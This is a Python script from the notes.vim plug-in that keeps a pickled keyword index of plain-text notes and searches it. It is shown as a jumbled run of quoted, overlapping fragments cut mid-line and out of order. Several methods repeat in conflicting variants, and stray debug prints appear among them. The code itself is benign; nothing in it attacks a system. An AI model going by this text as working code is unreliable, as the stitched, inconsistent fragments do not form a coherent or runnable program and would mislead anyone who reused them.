'verbose', 'help', ]) except getopt.GetoptError as error: print(str(error)) self.usage() sys.exit(2) #", "self.search_index(keywords) if matches: print('\\n'.join(sorted(matches))) logger.debug(\"Finished searching index in %s\", global_timer) def parse_args(self, argv):", "the dictionary may seem very naive but it's quite # fast. 
Also the", "decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames), kw)) else: decorated.append((-len(filenames), kw)) decorated.sort() selection = [d[-1] for d", "not word.isspace() and len(word) >= 2: words.add(word) return words def normalize(self, keyword): \"\"\"Normalize", "in %s ..\", len(notes_on_disk) - last_count, directory) last_count = len(notes_on_disk) logger.info(\"Found a total", "arg elif opt in ('-v', '--verbose'): logger.setLevel(logging.DEBUG) elif opt in ('-h', '--help'): self.usage()", "= self.normalize(kw) if substring in normalized_kw: if Levenshtein is not None: decorated.append((Levenshtein.distance(normalized_kw, substring),", "normalized_db_keywords = [(k, self.normalize(k)) for k in self.index['keywords']] for usr_kw in keywords: submatches", "= self.decode(self.keyword_filter) # Canonicalize pathnames, check validity. self.database_file = self.munge_path(self.database_file) self.user_directories = [self.munge_path(d)", "options to variables. for opt, arg in opts: if opt in ('-i', '--ignore-case'):", "for updated and/or deleted notes since the last run? if index: for filename", "self.character_encoding) if self.keyword_filter is not None: self.keyword_filter = self.decode(self.keyword_filter) # Canonicalize pathnames, check", "are stored only # once, so it's not as bad as it may", "and/or deleted notes since the last run? if index: for filename in set(index['files'].keys()):", "# # This Python script can be used by the notes.vim plug-in to", "Set try: import Levenshtein except ImportError: Levenshtein = None # The version of", "if index: for filename in set(index['files'].keys()): if filename not in notes_on_disk: # Forget", "self.index_location = index_location self.notes_directories = notes_directories self.index = load_index(self.index_location) def search(self, query: str)", "8 MB) and 25000 keywords and it's plenty fast. if usr_kw in normalized_db_kw:", "assert False, \"Unhandled option\" logger.debug(\"Index file: %s\", self.database_file) logger.debug(\"Notes directories: %r\", self.user_directories) logger.debug(\"Character", "can be used by the notes.vim plug-in to perform fast # keyword searches", "def load_index(index_location): try: load_timer = Timer() logger.debug(\"Loading index from %s ..\", index_location) with", "= self.parse_args(argv or sys.argv[1:]) self.load_index() self.update_index() if self.dirty: self.save_index() if self.keyword_filter is not", "open(index_location, 'rb') as handle: index = pickle.load(handle) logger.debug(\"Format version of index loaded from", "else: # Check whether previously seen note has changed? 
last_modified_on_disk = notes_on_disk[filename] last_modified_in_db", "command to search all of the user's notes: # # - Very large", "needed -- I have over # 850 notes (about 8 MB) and 25000", "%i\", self.index['version']) assert self.index['version'] == INDEX_VERSION, \"Incompatible index format detected!\" self.first_use = False", "('-l', '--list'): self.keyword_filter = arg.strip().lower() elif opt in ('-d', '--database'): self.database_file = arg", "NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle') logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger(__name__) def load_index(index_location): try:", "the keyword index to disk.\"\"\" with open(database_file, 'wb') as handle: pickle.dump(index, handle) class", "is not already indexed).\"\"\" logger.info(\"Adding file to index: %s\", filename) self.index['files'][filename] = last_modified", "preferred character encoding.\"\"\" if isinstance(text, str): text = codecs.encode(text, self.character_encoding, 'ignore') return text", "import os import re import sys import time import pickle from typing import", "empty one.\"\"\" try: load_timer = Timer() logger.debug(\"Loading index from %s ..\", self.database_file) with", "in self.index['keywords']: self.index['keywords'][kw] = [filename] else: self.index['keywords'][kw].append(filename) self.dirty = True def delete_note(self, filename):", "else: decorated.append((-len(filenames), kw)) decorated.sort() selection = [d[-1] for d in decorated[:limit]] print(selection) print(self.encode(u'\\n'.join(selection)))", "First we find the filenames and last modified times of the notes on", "last_modified with open(filename, encoding='utf-8') as handle: for kw in self.tokenize(handle.read()): if kw not", "for kw, filenames in self.index['keywords'].items(): normalized_kw = self.normalize(kw) if substring in normalized_kw: if", "# unsupported version, the script knows that it should rebuild the index. INDEX_VERSION", "submatches = set() for original_db_kw, normalized_db_kw in normalized_db_keywords: if word in normalized_db_kw: submatches.update(index['keywords'][original_db_kw])", "class Timer: \"\"\"Easy to use timer to keep track of long during operations.\"\"\"", "with open(index_location, 'rb') as handle: index = pickle.load(handle) logger.debug(\"Format version of index loaded", "\"\"\"Add a note to the index (assumes the note is not already indexed).\"\"\"", "\"\"\" Usage: search_notes.py [OPTIONS] KEYWORD... Search one or more directories of plain text", "or sys.argv[1:]) self.load_index() self.update_index() if self.dirty: self.save_index() if self.keyword_filter is not None: self.list_keywords(self.keyword_filter)", "fnmatch import getopt import logging import os import re import sys import time", "return {w.strip() for w in re.findall(r'\\w{3,}', text, re.UNICODE) if not w.isspace()} def save_index(self,", "'files': {}, 'version': INDEX_VERSION} else: return index class TextIndex: def __init__(self, index_location: str,", "'rb') as handle: index = pickle.load(handle) logger.debug(\"Format version of index loaded from disk:", "filename): \"\"\"Delete a note from given index.\"\"\" logger.info(\"Deleting file from index: %s\", filename)", "not in notes_on_disk: # Forget a deleted note. 
#!/usr/bin/env python

# Python script for fast text file searching using a keyword index on disk.
#
# Author: <NAME> <<EMAIL>>
# Last Change: November 1, 2015
# URL: http://peterodding.com/code/vim/notes/
# License: MIT
#
# This Python script can be used by the notes.vim plug-in to perform fast
# keyword searches in the user's notes. It has two advantages over just
# using Vim's internal :vimgrep command to search all of the user's notes:
#
#  - Very large notes don't slow searching down so much;
#  - Hundreds of notes can be searched in less than a second.
#
# The keyword index is a Python dictionary that's persisted using the pickle
# module. The structure of the dictionary may seem very naive but it's quite
# fast. Also the pickle protocol makes sure repeating strings are stored only
# once, so it's not as bad as it may appear at first sight :-).
#
# For more information about the Vim plug-in see http://peterodding.com/code/vim/notes/.

"""
Usage: search_notes.py [OPTIONS] KEYWORD...

Search one or more directories of plain text files using a full text index,
updated automatically during each invocation of the program.

Valid options include:

  -i, --ignore-case    ignore case of keyword(s)
  -l, --list=SUBSTR    list keywords matching substring
  -d, --database=FILE  set path to keywords index file
  -n, --notes=DIR      set directory with user notes (can be repeated)
  -e, --encoding=NAME  set character encoding of notes
  -v, --verbose        make more noise
  -h, --help           show this message and exit

For more information see http://peterodding.com/code/vim/notes/
"""

# Standard library modules.
import codecs
import fnmatch
import getopt
import logging
import os
import pickle
import re
import sys
import time
from typing import List, Set

# Use python-Levenshtein for ranking keyword suggestions when it's available.
try:
    import Levenshtein
except ImportError:
    Levenshtein = None

# The version of the index format that's supported by this revision of the
# `search_notes.py' script; if an existing index file is found with an
# unsupported version, the script knows that it should rebuild the index.
INDEX_VERSION = 3

# Filename matching patterns of files to include during scans.
INCLUDE_PATTERNS = {'*.md', '*.txt'}
NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')]
INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle')

logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)


def load_index(index_location):
    """Load the keyword index from disk, falling back to an empty index."""
    try:
        load_timer = Timer()
        logger.debug("Loading index from %s ..", index_location)
        with open(index_location, 'rb') as handle:
            index = pickle.load(handle)
        logger.debug("Format version of index loaded from disk: %i", index['version'])
        assert index['version'] == INDEX_VERSION, "Incompatible index format detected!"
        logger.debug("Loaded %i notes from index in %s", len(index['files']), load_timer)
    except Exception:
        logger.warning("Failed to load index from file!", exc_info=True)
        return {'keywords': {}, 'files': {}, 'version': INDEX_VERSION}
    else:
        return index
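
# For reference, a tiny index produced by this script might look like the
# following (the file name and timestamp are made-up examples): 'files' maps
# each note to its last modified time, while 'keywords' is an inverted index
# mapping each keyword to the list of notes that contain it.
#
#   {'version': 3,
#    'files': {'/home/user/notes/todo.md': 1446372054.0},
#    'keywords': {'buy': ['/home/user/notes/todo.md'],
#                 'milk': ['/home/user/notes/todo.md']}}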

class TextIndex:

    def __init__(self, index_location: str, notes_directories: List[str]):
        self.index_location = index_location
        self.notes_directories = notes_directories
        self.index = load_index(self.index_location)

    def search(self, query: str) -> List[str]:
        """Return names of files containing all of the given keywords."""
        print('Searching index')
        index = self.index
        needles = query.lower().split()
        matches = None
        normalized_db_keywords = [(k, k.lower()) for k in index['keywords']]
        for word in needles:
            submatches = set()
            for original_db_kw, normalized_db_kw in normalized_db_keywords:
                if word in normalized_db_kw:
                    submatches.update(index['keywords'][original_db_kw])
            if matches is None:
                matches = submatches
            else:
                matches &= submatches
        return sorted(matches) if matches else []

    def update_index(self):
        """Update the keyword index by scanning the notes directories."""
        index = self.index
        # First we find the filenames and last modified times of the notes on disk.
        notes_on_disk = {}
        for directory in self.notes_directories:
            for root, dirs, files in os.walk(directory):
                for filename in files:
                    if any(fnmatch.fnmatch(filename, pattern) for pattern in INCLUDE_PATTERNS):
                        abspath = os.path.join(root, filename)
                        notes_on_disk[abspath] = os.path.getmtime(abspath)
        logger.info("Found a total of %i notes ..", len(notes_on_disk))
        # Check for updated and/or deleted notes since the last run?
        if index:
            for filename in set(index['files'].keys()):
                if filename not in notes_on_disk:
                    # Forget a deleted note.
                    self.delete_note_from_index(index, filename)
                else:
                    # Check whether a previously seen note has changed.
                    last_modified_on_disk = notes_on_disk[filename]
                    last_modified_in_db = index['files'][filename]
                    if last_modified_on_disk > last_modified_in_db:
                        self.delete_note_from_index(index, filename)
                        self.add_note_to_index(index, filename, last_modified_on_disk)
                    # Already checked this note, we can forget about it.
                    del notes_on_disk[filename]
        # Add new notes to the index.
        for filename, last_modified in notes_on_disk.items():
            self.add_note_to_index(index, filename, last_modified)
        # TODO: Only save if necessary.
        self.save_index(self.index_location, index)

    def add_note_to_index(self, index, filename, last_modified):
        """Add a note to the index (assumes the note is not already indexed)."""
        logger.info("Adding file to index: %s", filename)
        index['files'][filename] = last_modified
        with open(filename, encoding='utf-8') as handle:
            raw = handle.read()
        for kw in self.tokenize(raw):
            if kw not in index['keywords']:
                index['keywords'][kw] = [filename]
            else:
                index['keywords'][kw].append(filename)

    def delete_note_from_index(self, index, filename):
        """Delete a note from the given index."""
        logger.info("Deleting file from index: %s", filename)
        del index['files'][filename]
        for kw in index['keywords']:
            index['keywords'][kw] = [x for x in index['keywords'][kw] if x != filename]

    def tokenize(self, text: str) -> Set[str]:
        """Tokenize a string into a set of normalized, unique keywords."""
        return {w.strip() for w in re.findall(r'\w{3,}', text, re.UNICODE) if not w.isspace()}

    def save_index(self, database_file: str, index):
        """Save the keyword index to disk."""
        with open(database_file, 'wb') as handle:
            pickle.dump(index, handle)
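
# A minimal usage sketch for TextIndex (never called here; the query string
# is a made-up example). Updating first ensures the index reflects the notes
# currently on disk, after which search() answers keyword queries.
def _example_text_index_usage():
    index = TextIndex(INDEX_FILE_PATH, NOTES_DIRECTORIES)
    index.update_index()
    # Print the notes that mention both keywords.
    for path in index.search('vim pickle'):
        print(path)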

class NotesIndex:

    def __init__(self, argv=None):
        """Entry point to the notes search."""
        global_timer = Timer()
        keywords = self.parse_args(argv or sys.argv[1:])
        self.load_index()
        self.update_index()
        if self.dirty:
            self.save_index()
        if self.keyword_filter is not None:
            self.list_keywords(self.keyword_filter)
            logger.debug("Finished listing keywords in %s", global_timer)
        else:
            matches = self.search_index(keywords)
            if matches:
                print('\n'.join(sorted(matches)))
            logger.debug("Finished searching index in %s", global_timer)

    def parse_args(self, argv):
        """Parse the command line arguments."""
        try:
            opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh', [
                'ignore-case', 'list=', 'database=', 'notes=',
                'encoding=', 'verbose', 'help',
            ])
        except getopt.GetoptError as error:
            print(str(error))
            self.usage()
            sys.exit(2)
        # Define the command line option defaults.
        self.database_file = '~/.vim/misc/notes/index.pickle'
        self.user_directories = ['~/.vim/misc/notes/user/']
        self.character_encoding = 'UTF-8'
        self.case_sensitive = True
        self.keyword_filter = None
        # Map command line options to variables.
        for opt, arg in opts:
            if opt in ('-i', '--ignore-case'):
                self.case_sensitive = False
                logger.debug("Disabling case sensitivity")
            elif opt in ('-l', '--list'):
                self.keyword_filter = arg.strip().lower()
            elif opt in ('-d', '--database'):
                self.database_file = arg
            elif opt in ('-n', '--notes'):
                self.user_directories.append(arg)
            elif opt in ('-e', '--encoding'):
                self.character_encoding = arg
            elif opt in ('-v', '--verbose'):
                logger.setLevel(logging.DEBUG)
            elif opt in ('-h', '--help'):
                self.usage()
                sys.exit(0)
            else:
                assert False, "Unhandled option"
        logger.debug("Index file: %s", self.database_file)
        logger.debug("Notes directories: %r", self.user_directories)
        logger.debug("Character encoding: %s", self.character_encoding)
        if self.keyword_filter is not None:
            self.keyword_filter = self.decode(self.keyword_filter)
        # Canonicalize pathnames, check validity.
        self.database_file = self.munge_path(self.database_file)
        self.user_directories = [self.munge_path(d) for d in self.user_directories]
        self.user_directories = [d for d in self.user_directories if os.path.isdir(d)]
        # Return tokenized keyword arguments.
        return [self.normalize(k) for k in self.tokenize(' '.join(keywords))]

    def load_index(self):
        """Load the keyword index or start with an empty one."""
        try:
            load_timer = Timer()
            logger.debug("Loading index from %s ..", self.database_file)
            with open(self.database_file, 'rb') as handle:
                self.index = pickle.load(handle)
            logger.debug("Format version of index loaded from disk: %i", self.index['version'])
            assert self.index['version'] == INDEX_VERSION, "Incompatible index format detected!"
            self.first_use = False
            self.dirty = False
            logger.debug("Loaded %i notes from index in %s", len(self.index['files']), load_timer)
        except Exception:
            logger.warning("Failed to load index from file!", exc_info=True)
            self.first_use = True
            self.dirty = True
            self.index = {'keywords': {}, 'files': {}, 'version': INDEX_VERSION}

    def save_index(self):
        """Save the keyword index to disk."""
        save_timer = Timer()
        with open(self.database_file, 'wb') as handle:
            pickle.dump(self.index, handle)
        logger.debug("Saved index to disk in %s", save_timer)
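
    # An example invocation (the paths and keywords are hypothetical):
    #
    #   python search_notes.py --ignore-case --notes=~/notes vim pickle
    #
    # parse_args() above would disable case sensitivity, add ~/notes to the
    # scanned directories and return the normalized keywords
    # ['vim', 'pickle'] for search_index() below.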

    def update_index(self):
        """Update the keyword index by scanning the notes directories."""
        update_timer = Timer()
        # First we find the filenames and last modified times of the notes on disk.
        notes_on_disk = {}
        last_count = 0
        for directory in self.user_directories:
            print('Scanning', directory)
            for root, dirs, files in os.walk(directory):
                for filename in files:
                    if any(fnmatch.fnmatch(filename, pattern) for pattern in INCLUDE_PATTERNS):
                        abspath = os.path.join(root, filename)
                        notes_on_disk[abspath] = os.path.getmtime(abspath)
            logger.info("Found %i notes in %s ..", len(notes_on_disk) - last_count, directory)
            last_count = len(notes_on_disk)
        logger.info("Found a total of %i notes ..", len(notes_on_disk))
        # Check for updated and/or deleted notes since the last run?
        if not self.first_use:
            for filename in list(self.index['files'].keys()):
                if filename not in notes_on_disk:
                    # Forget a deleted note.
                    self.delete_note(filename)
                else:
                    # Check whether a previously seen note has changed.
                    last_modified_on_disk = notes_on_disk[filename]
                    last_modified_in_db = self.index['files'][filename]
                    if last_modified_on_disk > last_modified_in_db:
                        self.delete_note(filename)
                        self.add_note(filename, last_modified_on_disk)
                    # Already checked this note, we can forget about it.
                    del notes_on_disk[filename]
        # Add new notes to the index.
        for filename, last_modified in notes_on_disk.items():
            self.add_note(filename, last_modified)
        logger.info("Updated index in %s", update_timer)

    def add_note(self, filename, last_modified):
        """Add a note to the index (assumes the note is not already indexed)."""
        logger.info("Adding file to index: %s", filename)
        self.index['files'][filename] = last_modified
        with open(filename, encoding='utf-8') as handle:
            for kw in self.tokenize(handle.read()):
                if kw not in self.index['keywords']:
                    self.index['keywords'][kw] = [filename]
                else:
                    self.index['keywords'][kw].append(filename)
        self.dirty = True

    def delete_note(self, filename):
        """Remove a note from the index."""
        logger.info("Removing file from index: %s", filename)
        del self.index['files'][filename]
        for kw in self.index['keywords']:
            self.index['keywords'][kw] = [x for x in self.index['keywords'][kw] if x != filename]
        self.dirty = True

    def search_index(self, keywords):
        """Return names of files containing all of the given keywords."""
        matches = None
        normalized_db_keywords = [(k, self.normalize(k)) for k in self.index['keywords']]
        for usr_kw in keywords:
            submatches = set()
            for original_db_kw, normalized_db_kw in normalized_db_keywords:
                # Yes I'm using a nested for loop over all keywords in the index. If
                # I really have to I'll probably come up with something more
                # efficient, but really it doesn't seem to be needed -- I have over
                # 850 notes (about 8 MB) and 25000 keywords and it's plenty fast.
                if usr_kw in normalized_db_kw:
                    submatches.update(self.index['keywords'][original_db_kw])
            if matches is None:
                matches = submatches
            else:
                matches &= submatches
        return list(matches) if matches else []
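
    # A worked micro-example of the intersection above (made-up file names):
    # with index['keywords'] == {'vim': ['a.md', 'b.md'], 'notes': ['b.md', 'c.md']}
    # the query ['vim', 'notes'] computes {'a.md', 'b.md'} & {'b.md', 'c.md'},
    # so only 'b.md' is reported. Note that `usr_kw in normalized_db_kw` is a
    # substring test, so 'vim' also matches the keyword 'vimscript' and widens
    # that submatch set before the intersection.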
Valid options include: -i, --ignore-case ignore case of keyword(s) -l, --list=SUBSTR list", "path, making it absolute.\"\"\" return os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip()) class Timer: \"\"\"Easy to", "and it's plenty fast. if usr_kw in normalized_db_kw: submatches.update(self.index['keywords'][original_db_kw]) if matches is None:", "filename, last_modified) # TODO: Only save if necessary. self.save_index(INDEX_FILE_PATH, index) def add_note_to_index(self, index,", "= arg elif opt in ('-v', '--verbose'): logger.setLevel(logging.DEBUG) elif opt in ('-h', '--help'):", "MIT # # This Python script can be used by the notes.vim plug-in", "keywords.\"\"\" words = set() text = self.decode(text) for word in re.findall(r'\\w+', text, re.UNICODE):", "%s\", filename) del self.index['files'][filename] for kw in self.index['keywords']: self.index['keywords'][kw] = [x for x", "logger.warning(\"Failed to load index from file!\", exc_info=True) return {'keywords': {}, 'files': {}, 'version':", "http://peterodding.com/code/vim/notes/ \"\"\" # Standard library modules. import codecs import fnmatch import getopt import", "and/or deleted notes since the last run? if not self.first_use: for filename in", "a deleted note. self.delete_note_from_index(index, filename) else: # Check whether previously seen note has", "= notes_directories self.index = load_index(self.index_location) def search(self, query: str) -> List[str]: \"\"\"Return names", "necessary. self.save_index(INDEX_FILE_PATH, index) def add_note_to_index(self, index, filename, last_modified): \"\"\"Add a note to the", "index['keywords'][kw] = [filename] else: index['keywords'][kw].append(filename) def delete_note_from_index(self, index, filename): \"\"\"Delete a note from", "Very large notes don't slow searching down so much; # - Hundreds of", "logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger(__name__) def load_index(index_location): try: load_timer = Timer() logger.debug(\"Loading index from", "= [] substring = self.normalize(substring) for kw, filenames in self.index['keywords'].items(): normalized_kw = self.normalize(kw)", "notes_on_disk: # Forget a deleted note. self.delete_note_from_index(index, filename) else: # Check whether previously", "given index.\"\"\" logger.info(\"Deleting file from index: %s\", filename) del index['files'][filename] for kw in", "= False logger.debug(\"Loaded %i notes from index in %s\", len(self.index['files']), load_timer) except Exception:", "index_location self.notes_directories = notes_directories self.index = load_index(self.index_location) def search(self, query: str) -> List[str]:", "so much; # - Hundreds of notes can be searched in less than", ":vimgrep command to search all of the user's notes: # # - Very", "List, Set try: import Levenshtein except ImportError: Levenshtein = None # The version", "- Hundreds of notes can be searched in less than a second. #", "a list of normalized, unique keywords.\"\"\" return {w.strip() for w in re.findall(r'\\w{3,}', text,", "searched in less than a second. # # The keyword index is a", "self.delete_note(filename) else: # Check whether previously seen note has changed? 
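# A minimal sketch (added for illustration, not part of the original script)
# of the pickled index dictionary described in the header comment, for a
# single hypothetical note file:
#
#   {'version': 3,
#    'files': {'/home/user/notes/todo.txt': 1446336000.0},
#    'keywords': {'groceries': ['/home/user/notes/todo.txt'],
#                 'appointment': ['/home/user/notes/todo.txt']}}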
# Standard library modules.
import codecs
import fnmatch
import getopt
import logging
import os
import re
import sys
import time
import pickle

from typing import List, Set

# The python-Levenshtein package is optional; when it's available, keyword
# listings are ranked by edit distance to the given substring.
try:
    import Levenshtein
except ImportError:
    Levenshtein = None

# The version of the index format that's supported by this revision of the
# `search_notes.py' script; if an existing index file is found with an
# unsupported version, the script knows that it should rebuild the index.
INDEX_VERSION = 3

# Filename matching patterns of files to include during scans.
INCLUDE_PATTERNS = {'*.md', '*.txt'}
NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')]
INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle')

logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
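# Quick illustration (added, not part of the original script) of how
# filenames are matched against INCLUDE_PATTERNS with fnmatch:
#
#   >>> any(fnmatch.fnmatch('todo.txt', p) for p in INCLUDE_PATTERNS)
#   True
#   >>> any(fnmatch.fnmatch('notes.org', p) for p in INCLUDE_PATTERNS)
#   False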
def load_index(index_location):
    """Load the keyword index from disk, falling back to an empty index."""
    try:
        load_timer = Timer()
        logger.debug("Loading index from %s ..", index_location)
        with open(index_location, 'rb') as handle:
            index = pickle.load(handle)
        logger.debug("Format version of index loaded from disk: %i", index['version'])
        assert index['version'] == INDEX_VERSION, "Incompatible index format detected!"
        logger.debug("Loaded %i notes from index in %s", len(index['files']), load_timer)
    except Exception:
        logger.warning("Failed to load index from file!", exc_info=True)
        return {'keywords': {}, 'files': {}, 'version': INDEX_VERSION}
    else:
        return index
class TextIndex:

    def __init__(self, index_location: str, notes_directories: List[str]):
        self.index_location = index_location
        self.notes_directories = notes_directories
        self.index = load_index(self.index_location)

    def search(self, query: str) -> List[str]:
        """Return names of files containing all of the given keywords."""
        # Reload the index from the configured location.
        index = load_index(self.index_location)
        needles = query.split()
        matches = None
        normalized_db_keywords = [(k, k.lower()) for k in index['keywords']]
        for word in needles:
            submatches = set()
            for original_db_kw, normalized_db_kw in normalized_db_keywords:
                if word in normalized_db_kw:
                    submatches.update(index['keywords'][original_db_kw])
            if matches is None:
                matches = submatches
            else:
                matches &= submatches
        return sorted(matches) if matches else []

    def update_index(self):
        """Update the keyword index by scanning the notes directories."""
        index = self.index
        # First we find the filenames and last modified times of the notes on disk.
        notes_on_disk = {}
        last_count = 0
        for directory in self.notes_directories:
            for root, dirs, files in os.walk(directory):
                for filename in files:
                    if any(fnmatch.fnmatch(filename, pattern) for pattern in INCLUDE_PATTERNS):
                        abspath = os.path.join(root, filename)
                        notes_on_disk[abspath] = os.path.getmtime(abspath)
            logger.info("Found %i notes in %s ..", len(notes_on_disk) - last_count, directory)
            last_count = len(notes_on_disk)
        logger.info("Found a total of %i notes ..", len(notes_on_disk))
        # Check for updated and/or deleted notes since the last run.
        if index:
            for filename in set(index['files'].keys()):
                if filename not in notes_on_disk:
                    # Forget a deleted note.
                    self.delete_note_from_index(index, filename)
                else:
                    # Check whether a previously seen note has changed.
                    last_modified_on_disk = notes_on_disk[filename]
                    last_modified_in_db = index['files'][filename]
                    if last_modified_on_disk > last_modified_in_db:
                        self.delete_note_from_index(index, filename)
                        self.add_note_to_index(index, filename, last_modified_on_disk)
                    # Already checked this note, we can forget about it.
                    del notes_on_disk[filename]
        # Add new notes to the index.
        for filename, last_modified in notes_on_disk.items():
            self.add_note_to_index(index, filename, last_modified)
        # TODO: Only save if necessary.
        self.save_index(self.index_location, index)

    def add_note_to_index(self, index, filename, last_modified):
        """Add a note to the index (assumes the note is not already indexed)."""
        logger.info("Adding file to index: %s", filename)
        index['files'][filename] = last_modified
        with open(filename, encoding='utf-8') as handle:
            raw = handle.read()
            for kw in self.tokenize(raw):
                if kw not in index['keywords']:
                    index['keywords'][kw] = [filename]
                else:
                    index['keywords'][kw].append(filename)

    def delete_note_from_index(self, index, filename):
        """Delete a note from the given index."""
        logger.info("Deleting file from index: %s", filename)
        del index['files'][filename]
        for kw in index['keywords']:
            index['keywords'][kw] = [x for x in index['keywords'][kw] if x != filename]

    def tokenize(self, text: str) -> Set[str]:
        """Tokenize a string into a set of normalized, unique keywords."""
        return {w.strip() for w in re.findall(r'\w{3,}', text, re.UNICODE) if not w.isspace()}

    def save_index(self, database_file: str, index):
        """Save the keyword index to disk."""
        with open(database_file, 'wb') as handle:
            pickle.dump(index, handle)
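# A minimal usage sketch of the TextIndex class above (added for
# illustration; the query keywords are hypothetical):
#
#   index = TextIndex(INDEX_FILE_PATH, NOTES_DIRECTORIES)
#   index.update_index()
#   for filename in index.search('python pickle'):
#       print(filename)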
class NotesIndex:

    def __init__(self, argv=None):
        """Entry point to the notes search."""
        global_timer = Timer()
        keywords = self.parse_args(argv or sys.argv[1:])
        self.load_index()
        self.update_index()
        if self.dirty:
            self.save_index()
        if self.keyword_filter is not None:
            self.list_keywords(self.keyword_filter)
            logger.debug("Finished listing keywords in %s", global_timer)
        else:
            matches = self.search_index(keywords)
            if matches:
                print('\n'.join(sorted(matches)))
            logger.debug("Finished searching index in %s", global_timer)

    def parse_args(self, argv):
        """Parse the command line arguments."""
        try:
            opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh', [
                'ignore-case', 'list=', 'database=', 'notes=',
                'encoding=', 'verbose', 'help',
            ])
        except getopt.GetoptError as error:
            print(str(error))
            self.usage()
            sys.exit(2)
        # Define the command line option defaults.
        self.database_file = '~/.vim/misc/notes/index.pickle'
        self.user_directories = ['~/.vim/misc/notes/user/']
        self.character_encoding = 'UTF-8'
        self.case_sensitive = True
        self.keyword_filter = None
        # Map command line options to variables.
        for opt, arg in opts:
            if opt in ('-i', '--ignore-case'):
                self.case_sensitive = False
                logger.debug("Disabling case sensitivity")
            elif opt in ('-l', '--list'):
                self.keyword_filter = arg.strip().lower()
            elif opt in ('-d', '--database'):
                self.database_file = arg
            elif opt in ('-n', '--notes'):
                self.user_directories.append(arg)
            elif opt in ('-e', '--encoding'):
                self.character_encoding = arg
            elif opt in ('-v', '--verbose'):
                logger.setLevel(logging.DEBUG)
            elif opt in ('-h', '--help'):
                self.usage()
                sys.exit(0)
            else:
                assert False, "Unhandled option"
        logger.debug("Index file: %s", self.database_file)
        logger.debug("Notes directories: %r", self.user_directories)
        logger.debug("Character encoding: %s", self.character_encoding)
        if self.keyword_filter is not None:
            self.keyword_filter = self.decode(self.keyword_filter)
        # Canonicalize pathnames, check validity.
        self.database_file = self.munge_path(self.database_file)
        self.user_directories = [self.munge_path(d) for d in self.user_directories if os.path.isdir(d)]
        # Return tokenized keyword arguments.
        return [self.normalize(k) for k in self.tokenize(' '.join(keywords))]

    def load_index(self):
        """Load the keyword index or start with an empty one."""
        try:
            load_timer = Timer()
            logger.debug("Loading index from %s ..", self.database_file)
            with open(self.database_file, 'rb') as handle:
                self.index = pickle.load(handle)
            logger.debug("Format version of index loaded from disk: %i", self.index['version'])
            assert self.index['version'] == INDEX_VERSION, "Incompatible index format detected!"
            self.first_use = False
            self.dirty = False
            logger.debug("Loaded %i notes from index in %s", len(self.index['files']), load_timer)
        except Exception:
            logger.warning("Failed to load index from file!", exc_info=True)
            self.first_use = True
            self.dirty = True
            self.index = {'keywords': {}, 'files': {}, 'version': INDEX_VERSION}

    def save_index(self):
        """Save the keyword index to disk."""
        save_timer = Timer()
        with open(self.database_file, 'wb') as handle:
            pickle.dump(self.index, handle)
        logger.debug("Saved index to disk in %s", save_timer)

    def update_index(self):
        """Update the keyword index by scanning the notes directories."""
        update_timer = Timer()
        # First we find the filenames and last modified times of the notes on disk.
        notes_on_disk = {}
        last_count = 0
        for directory in self.user_directories:
            for root, dirs, files in os.walk(directory):
                for filename in files:
                    if any(fnmatch.fnmatch(filename, pattern) for pattern in INCLUDE_PATTERNS):
                        abspath = os.path.join(root, filename)
                        notes_on_disk[abspath] = os.path.getmtime(abspath)
            logger.info("Found %i notes in %s ..", len(notes_on_disk) - last_count, directory)
            last_count = len(notes_on_disk)
        logger.info("Found a total of %i notes ..", len(notes_on_disk))
        # Check for updated and/or deleted notes since the last run.
        if not self.first_use:
            # Copy the keys because delete_note() mutates the dictionary
            # while we're iterating over it.
            for filename in list(self.index['files'].keys()):
                if filename not in notes_on_disk:
                    # Forget a deleted note.
                    self.delete_note(filename)
                else:
                    # Check whether a previously seen note has changed.
                    last_modified_on_disk = notes_on_disk[filename]
                    last_modified_in_db = self.index['files'][filename]
                    if last_modified_on_disk > last_modified_in_db:
                        self.delete_note(filename)
                        self.add_note(filename, last_modified_on_disk)
                    # Already checked this note, we can forget about it.
                    del notes_on_disk[filename]
        # Add new notes to the index.
        for filename, last_modified in notes_on_disk.items():
            self.add_note(filename, last_modified)
        logger.info("Updated index in %s", update_timer)

    def add_note(self, filename, last_modified):
        """Add a note to the index (assumes the note is not already indexed)."""
        logger.info("Adding file to index: %s", filename)
        self.index['files'][filename] = last_modified
        with open(filename, encoding='utf-8') as handle:
            for kw in self.tokenize(handle.read()):
                if kw not in self.index['keywords']:
                    self.index['keywords'][kw] = [filename]
                else:
                    self.index['keywords'][kw].append(filename)
        self.dirty = True

    def delete_note(self, filename):
        """Remove a note from the index."""
        logger.info("Removing file from index: %s", filename)
        del self.index['files'][filename]
        for kw in self.index['keywords']:
            self.index['keywords'][kw] = [x for x in self.index['keywords'][kw] if x != filename]
        self.dirty = True

    def search_index(self, keywords):
        """Return names of files containing all of the given keywords."""
        matches = None
        normalized_db_keywords = [(k, self.normalize(k)) for k in self.index['keywords']]
        for usr_kw in keywords:
            submatches = set()
            for original_db_kw, normalized_db_kw in normalized_db_keywords:
                # Yes I'm using a nested for loop over all keywords in the index.
                # If I really have to I'll probably come up with something more
                # efficient, but really it doesn't seem to be needed -- I have
                # over 850 notes (about 8 MB) and 25000 keywords and it's plenty
                # fast.
                if usr_kw in normalized_db_kw:
                    submatches.update(self.index['keywords'][original_db_kw])
            if matches is None:
                matches = submatches
            else:
                matches &= submatches
        return list(matches) if matches else []

    def list_keywords(self, substring, limit=25):
        """Print all (matching) keywords to standard output."""
        decorated = []
        substring = self.normalize(substring)
        for kw, filenames in self.index['keywords'].items():
            normalized_kw = self.normalize(kw)
            if substring in normalized_kw:
                if Levenshtein is not None:
                    decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames), kw))
                else:
                    decorated.append((-len(filenames), kw))
